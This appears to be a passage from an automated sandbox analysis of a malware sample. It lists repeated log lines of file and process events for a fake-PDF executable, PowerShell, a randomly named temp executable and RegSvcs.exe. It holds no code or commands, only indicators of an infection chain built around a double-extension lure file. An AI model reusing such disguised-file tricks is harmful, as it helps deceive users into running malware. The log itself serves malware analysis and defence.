Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
